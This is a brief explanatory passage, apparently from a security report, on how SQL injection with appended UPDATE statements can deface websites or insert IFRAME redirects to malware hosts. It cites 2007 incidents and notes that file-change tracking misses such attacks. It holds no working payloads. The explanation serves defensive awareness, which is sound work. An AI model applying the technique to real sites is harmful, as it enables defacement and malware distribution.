SQL Injection for Web site defacement

Web site defacement traditionally occurred when a hacker obtained administrative privileges to a Web site and then altered the content of the Web site with potentially offensive or erroneous graphics and text. While Web site owners have bolstered the security of Web configuration tools, malicious users have discovered a new technique to deface Web sites: SQL injection.

In 2007, there were several high profile incidents in which SQL injection was used for Web site defacement. In fact, the Microsoft UK(3) site and the United Nations(4) (UN) sites were defaced within just months of each other in 2007. This type of attack is made possible when the injection point allows not only tampering with the criteria of a SELECT statement but also appending additional SQL statements such as INSERT or UPDATE. In particular, an attacker can construct an UPDATE statement to tamper with the contents of database columns that are later embedded in HTML pages. The attacker would replace the original content of such columns with HTML code to either change the appearance of a page (by embedding offensive images) or silently redirecting a client to a malware hosting server (by embedding IFRAME tags).

Because this type of Web site defacement affects the backend database rather than the static Web application files, even if there is a static change tracking system or change management system being used, neither of these mechanisms would detect the attack.